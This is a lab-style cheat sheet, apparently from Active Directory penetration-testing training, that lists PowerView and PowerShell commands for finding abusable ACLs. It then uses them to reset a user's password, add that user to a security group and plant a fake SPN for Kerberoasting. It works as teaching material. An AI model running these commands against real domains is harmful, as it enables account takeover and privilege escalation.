ACL Enumeration & Tactics

1. Find Object ACLs in Windows Domain

Command:

Find-InterestingDomainAcl

• Description: Used to find object ACLs in the target Windows domain with modification rights set to non-built-in objects from a Windows-based host.

---

2. Import PowerView and Retrieve User SID

Command:

Import-Module .\PowerView.ps1
$sid = Convert-NameToSid wley

• Description: Used to import PowerView and retrieve the SID of a specific user account (wley) from a Windows-based host.

---

3. Find Domain Objects a User Has Rights Over

Command:

Get-DomainObjectACL -Identity * | ? {$_.SecurityIdentifier -eq $sid}

• Description: Used to find all Windows domain objects that the user has rights over by mapping the user's SID to the SecurityIdentifier property.

---

4. Perform Reverse Search & Map GUID

Command:

$guid= "00299570-246d-11d0-a768-00aa006e0529"
Get-ADObject -SearchBase "CN=Extended-Rights,$((Get-ADRootDSE).ConfigurationNamingContext)" -Filter {ObjectClass -like 'ControlAccessRight'} -Properties * | Select Name,DisplayName,DistinguishedName,rightsGuid | ?{$_.rightsGuid -eq $guid} | fl

• Description: Used to perform a reverse search & map to a GUID value from a Windows-based host.

---

5. Discover Domain Object ACL Based on GUID

Command:

Get-DomainObjectACL -ResolveGUIDs -Identity * | ? {$_.SecurityIdentifier -eq $sid}

• Description: Used to discover a domain object's ACL by performing a search based on GUIDs (-ResolveGUIDs).

---

6. Discover User Accounts in Domain & Save to File

Command:

Get-ADUser -Filter * | Select-Object -ExpandProperty SamAccountName > ad_users.txt

• Description: Used to discover a group of user accounts in a target Windows domain and add the output to a text file (ad_users.txt).

---

7. Retrieve ACL Information for Each Domain User

Command:

foreach($line in [System.IO.File]::ReadLines("C:\Users\htbstudent\Desktop\ad_users.txt")) {
    get-acl "AD:\$(Get-ADUser $line)" | Select-Object Path -ExpandProperty Access | Where-Object {$_.IdentityReference -match 'INLANEFREIGHT\\wley'}
}

• Description: Loops through the list of domain users from ad_users.txt, retrieves their ACL information, and filters results for INLANEFREIGHT\wley.

---

8. Create a PSCredential Object

Command:

$SecPassword = ConvertTo-SecureString '<PASSWORD HERE>' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('INLANEFREIGHT\wley', $SecPassword)

• Description: Used to create a PSCredential object.

---

9. Create a SecureString Object

Command:

$damundsenPassword = ConvertTo-SecureString 'Pwn3d_by_ACLs!' -AsPlainText -Force

• Description: Used to create a SecureString object.

---

10. Change a User’s Password

Command:

Set-DomainUserPassword -Identity damundsen -AccountPassword $damundsenPassword -Credential $Cred -Verbose

• Description: PowerView command to change the password of a specific user (damundsen) on a target Windows domain.

---

11. View Members of a Security Group

Command:

Get-ADGroup -Identity "Help Desk Level 1" -Properties * | Select -ExpandProperty Members

• Description: Used to view the members of a target security group (Help Desk Level 1).

---

12. Add a User to a Security Group

Command:

Add-DomainGroupMember -Identity 'Help Desk Level 1' -Members 'damundsen' -Credential $Cred2 -Verbose

• Description: Adds a specific user (damundsen) to a security group (Help Desk Level 1).

---

13. View Only Usernames of Security Group Members

Command:

Get-DomainGroupMember -Identity "Help Desk Level 1" | Select MemberName

• Description: Retrieves the members of Help Desk Level 1 security group, displaying only their usernames.

---

14. Create a Fake Service Principal Name (SPN)

Command:

Set-DomainObject -Credential $Cred2 -Identity adunn -SET @{serviceprincipalname='notahacker/LEGIT'} -Verbose

• Description: Creates a fake Service Principal Name for a specific user (adunn).

---

15. Remove a Fake Service Principal Name (SPN)

Command:

Set-DomainObject -Credential $Cred2 -Identity adunn -Clear serviceprincipalname -Verbose

• Description: Removes a previously created fake Service Principal Name.

---

16. Remove a User from a Security Group

Command:

Remove-DomainGroupMember -Identity "Help Desk Level 1" -Members 'damundsen' -Credential $Cred2 -Verbose

• Description: Removes a specific user (damundsen) from the security group Help Desk Level 1.

---

17. Convert an SDDL String into Readable Format

Command:

ConvertFrom-SddlString

• Description: PowerShell cmdlet used to convert an SDDL string into a readable format.